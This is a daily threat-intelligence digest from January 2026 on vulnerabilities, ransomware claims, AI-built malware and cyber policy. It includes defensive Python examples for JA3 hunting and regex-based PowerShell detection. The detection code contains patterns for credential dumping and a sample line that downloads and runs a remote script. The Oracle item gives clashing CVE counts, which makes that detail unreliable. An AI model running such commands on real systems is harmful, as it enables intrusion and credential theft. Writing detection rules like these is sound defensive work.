Chrome V8 RCE 🔥, AI-generated malware 🤖, ransomware campaigns 💸, Azure DoS flaws ⚡, WordPress vulns 🛠️

Daily Threat Intel Digest - 2026-01-21

🔴 Critical Threats & Active Exploitation

[NEW] Chrome 144 patches actively exploitable V8 RCE flaw
Google released Chrome 144 to patch CVE-2026-1220, a high-severity race condition in the V8 JavaScript engine allowing arbitrary code execution. Attackers can craft malicious websites to exploit this flaw and bypass Chrome’s sandbox, enabling credential theft, malware installation, and unauthorized data access [CyberPress; GBHackers]. Users should prioritize immediate updates via Chrome’s settings menu.

[NEW] Azure Private Endpoint flaw enables DoS attacks on cloud resources
A critical architectural vulnerability in Azure’s Private Endpoint deployments allows attackers to cause denial-of-service conditions through DNS resolution manipulation. The issue affects over 5% of Azure storage accounts and critical services including Key Vault and Cosmos DB, where creating a Private Endpoint in one network can disrupt access for resources in other networks [CyberPress; GBHackers]. Organizations should audit hybrid network configurations and implement Azure Resource Graph queries to identify vulnerable deployments.

[NEW] Everest ransomware claims 861GB breach of McDonald’s India systems
The Russian-speaking Everest group allegedly exfiltrated customer personal information and internal documents from McDonald’s India operations, threatening public release unless ransom demands are met. This represents one of the largest breaches of McDonald’s franchise operations globally, following previous incidents in 2017 and 2024 [CyberPress; GBHackers]. The group specializes in “pure extortion” tactics, prioritizing data theft over encryption.

🎯 Threat Actor Activity & Campaigns

[UPDATE] VoidLink malware confirmed as AI-generated framework
New analysis reveals that the VoidLink cloud malware framework was predominantly developed with AI assistance: OPSEC failures exposed source code generated via the TRAE SOLO AI assistant. The framework reached 88,000 lines of code within weeks of its inception in late 2025, demonstrating how AI enables a single actor to build capabilities that previously required a team [Check Point; BleepingComputer]. This confirms suspicions from initial reports and marks the first documented advanced malware primarily generated by AI.

[NEW] Ransomware gangs expand multi-sector targeting
New ransomware claims include: Sarcoma targeting Italian software firm MecMatica [DeXpose], WorldLeaks attacking Taiwan’s Might Electronic Co. [DeXpose], TheGentlemen breaching Italian snack producer San Carlo Gruppo Alimentare [DeXpose], and Qilin compromising Spain’s Altius Geotecnia y Obras Especiales [DeXpose]. All groups threaten public data leaks unless ransoms are paid.

⚠️ Vulnerabilities & Patches

[NEW] Oracle January CPU addresses 158 CVEs, including critical Java SSRF
Oracle’s first 2026 Critical Patch Update fixes 337 vulnerabilities across 30 product families, with 27 rated critical. Notably, CVE-2026-21945 addresses a high-severity server-side request forgery (SSRF) flaw in Java’s TLS handshake process that allows attackers to trigger denial-of-service conditions via malicious client certificates [Tenable; Tenable Advisory]. Organizations using mutual TLS (mTLS) should prioritize Java updates immediately.

[NEW] WordPress ACF Extended plugin exposes 50K+ sites to admin takeover
A critical privilege escalation vulnerability (CVE-2025-14533) in the Advanced Custom Fields Extended plugin allows unauthenticated attackers to gain administrative permissions by abusing form-based user creation. Of roughly 100K active installations, approximately 50K sites remain vulnerable because patch uptake has been low [BleepingComputer]. Sites using ‘Create User’ or ‘Update User’ forms with role fields should update to version 0.9.2.2 immediately.

🛡️ Defense & Detection

[NEW] JA3 fingerprinting resurgence for threat hunting
Security researchers advocate renewed use of JA3 TLS fingerprints to identify attacker infrastructure and tools. When combined with context like SNI, JA3S, and URI patterns, JA3 enables clustering of malicious activity across campaigns, early detection of new tooling via frequency analysis, and pivoting between malware samples [ANY.RUN]. Key suspicious hashes include Remcos RAT (a85be79f7b569f1df5e6087b69deb493) and Skuld data exfiltration tools (e69402f870ecf542b4f017b0ed32936a).
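The JA3 workflow described above, as an added example that is not from ANY.RUN or the original digest: it builds the JA3 string and hash from ClientHello fields (dropping GREASE values), then runs a watchlist check and a frequency-based rarity check with SNI context over a constructed session log. The two watchlist hashes are the ones quoted in the item; every other hash, host and SNI in the sample is a constructed dummy.

```python
import hashlib
import ipaddress
from collections import Counter

# GREASE values (RFC 8701) are randomised per connection and must be dropped
# before hashing, or one client would yield many different JA3s.
def _is_grease(v: int) -> bool:
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)

def ja3_string(version, ciphers, extensions, curves, point_formats) -> str:
    """JA3 string: five comma-separated fields, list entries dash-separated, decimal."""
    def fmt(vals):
        return "-".join(str(v) for v in vals if not _is_grease(v))
    return ",".join([str(version), fmt(ciphers), fmt(extensions), fmt(curves), fmt(point_formats)])

def ja3_hash(version, ciphers, extensions, curves, point_formats) -> str:
    """JA3 fingerprint: MD5 of the JA3 string as 32 lowercase hex characters."""
    s = ja3_string(version, ciphers, extensions, curves, point_formats)
    return hashlib.md5(s.encode("ascii")).hexdigest()

# Fingerprints quoted in the digest item (Remcos RAT, Skuld).
WATCHLIST = {"a85be79f7b569f1df5e6087b69deb493": "Remcos RAT",
             "e69402f870ecf542b4f017b0ed32936a": "Skuld"}

def _sni_is_ip(sni: str) -> bool:
    try:
        ipaddress.ip_address(sni)
        return True
    except ValueError:
        return False

def hunt(records, watchlist=WATCHLIST, rare_max=1):
    """(reason, record) pairs: watchlist hits, plus JA3s seen <= rare_max times
    whose context (empty or IP-literal SNI) makes them worth a pivot."""
    freq = Counter(r["ja3"] for r in records)
    out = []
    for r in records:
        if r["ja3"] in watchlist:
            out.append(("watchlist:" + watchlist[r["ja3"]], r))
        elif freq[r["ja3"]] <= rare_max and (not r["sni"] or _sni_is_ip(r["sni"])):
            out.append(("rare-ja3-with-ip-sni", r))
    return out

# Constructed sample sessions (not real traffic); non-watchlist hashes are dummies.
SAMPLE = [
    {"src": "10.0.0.5", "ja3": "11" * 16, "ja3s": "aa" * 16, "sni": "example.com"},
    {"src": "10.0.0.6", "ja3": "11" * 16, "ja3s": "aa" * 16, "sni": "example.com"},
    {"src": "10.0.0.7", "ja3": "a85be79f7b569f1df5e6087b69deb493", "ja3s": "bb" * 16, "sni": "203.0.113.7"},
    {"src": "10.0.0.8", "ja3": "22" * 16, "ja3s": "bb" * 16, "sni": "198.51.100.9"},
    {"src": "10.0.0.9", "ja3": "33" * 16, "ja3s": "aa" * 16, "sni": "cdn.example.net"},
]
```

The rare-but-benign session (a domain SNI) is deliberately left unflagged; grouping records by (ja3, ja3s, sni) with a Counter gives the campaign clustering the item mentions.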

[NEW] PowerShell.Exposed launches community detection indicators
A new community-driven repository introduces 89 regex-based indicators for detecting suspicious PowerShell payloads, covering MITRE ATT&CK techniques including lateral movement and credential dumping. The project provides specialized detection modeling beyond atomic alerts, enabling correlation across Script Block Logging and XDR telemetry [Detect FYI]. Organizations can integrate indicators into SIEM platforms via the free detection engine.
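An added illustration of the approach described above, not the PowerShell.Exposed rule set itself: a handful of constructed regex indicators tagged with ATT&CK technique IDs are matched against Script Block Logging events (Event ID 4104 style), then correlated per host so that an alert needs more than one atomic hit. The indicator patterns, weights and thresholds are assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict

# Constructed indicators: (name, regex, ATT&CK technique, weight). These are
# illustrative, not the project's 89 published rules.
INDICATORS = [
    ("encoded_command", r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", "T1027", 3),
    ("iex_download", r"(?:IEX|Invoke-Expression)[^\n]*Download(?:String|File)", "T1059.001", 4),
    ("remote_invoke", r"Invoke-Command\s+-ComputerName", "T1021.006", 2),
    ("cred_dump_tool", r"sekurlsa|Invoke-Mimikatz", "T1003.001", 5),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), t, w) for n, p, t, w in INDICATORS]

def match_event(text):
    """Atomic stage: every indicator that fires on a single script block."""
    return [(n, t, w) for n, rx, t, w in COMPILED if rx.search(text)]

def correlate(events, min_score=6, min_techniques=2):
    """Correlation stage: aggregate hits per host and alert only when the
    combined weight or the number of distinct techniques crosses a threshold."""
    per_host = defaultdict(lambda: {"score": 0, "techniques": set(), "hits": []})
    for ev in events:
        for name, tech, weight in match_event(ev["ScriptBlockText"]):
            h = per_host[ev["Computer"]]
            h["score"] += weight
            h["techniques"].add(tech)
            h["hits"].append((ev["EventRecordID"], name))
    return {host: h for host, h in per_host.items()
            if h["score"] >= min_score or len(h["techniques"]) >= min_techniques}

# Constructed 4104-style events (not real telemetry). WS01 and WS03 each produce a
# single atomic hit and stay below the alert bar; WS02 combines two techniques.
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "Computer": "WS01", "ScriptBlockText": "Get-ChildItem C:\\Temp"},
    {"EventRecordID": 2, "Computer": "WS01", "ScriptBlockText": "Invoke-Command -ComputerName FS01 -ScriptBlock { hostname }"},
    {"EventRecordID": 3, "Computer": "WS02", "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"},
    {"EventRecordID": 4, "Computer": "WS02", "ScriptBlockText": "Invoke-Command -ComputerName DC01 -ScriptBlock { whoami }"},
    {"EventRecordID": 5, "Computer": "WS03", "ScriptBlockText": "powershell -enc " + "A" * 44},
]
```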

📋 Policy & Industry News

[NEW] EU proposes phase-out of high-risk telecom suppliers
The European Commission announced new cybersecurity legislation mandating removal of high-risk suppliers from telecommunications networks and critical infrastructure. While not naming specific companies, the proposal targets Chinese tech firms like Huawei and ZTE, following failures in voluntary 5G security measures [SecurityWeek; BleepingComputer]. The revised Cybersecurity Act also empowers ENISA for early threat alerts and ransomware response.

[NEW] Congressional appropriations extend cyber information sharing law
U.S. congressional appropriators announced funding legislation extending the Cybersecurity Information Sharing Act of 2015 through September 2026, providing liability protections for threat intelligence sharing. The package also allocates $2.6 billion to CISA, including $39.6M for election security programs and directives maintaining staffing levels [CyberScoop]. The State and Local Cybersecurity Grants Program receives extension through fiscal 2026.